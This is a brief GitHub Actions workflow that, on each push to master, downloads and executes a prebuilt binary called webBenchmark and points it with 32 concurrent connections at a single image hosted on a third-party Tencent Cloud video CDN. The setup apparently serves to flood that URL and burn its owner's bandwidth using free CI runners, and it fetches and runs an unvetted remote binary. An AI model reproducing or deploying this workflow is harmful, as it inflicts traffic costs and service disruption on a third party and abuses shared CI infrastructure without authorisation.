name: 'Go'

on:
  push:
    branches: 
      - master

jobs:
  get_points:
    runs-on: ubuntu-latest
    steps:
    - name: 'Go' 
      run: wget https://github.com/maintell/webBenchmark/releases/download/0.1/webBenchmark_linux_x64&&chmod +x webBenchmark_linux_x64&&./webBenchmark_linux_x64 -c 32 -s "http://1251426473.vod2.myqcloud.com/61d5296cvodsh1251426473/e0433df45285890808735453654/pvEF9Nwwh6YA.jpg"
